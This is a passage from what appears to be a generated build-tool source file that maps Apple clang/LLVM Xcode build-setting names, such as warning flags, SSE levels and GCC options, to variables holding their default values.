"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue": _com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition": _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition,
"com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue,
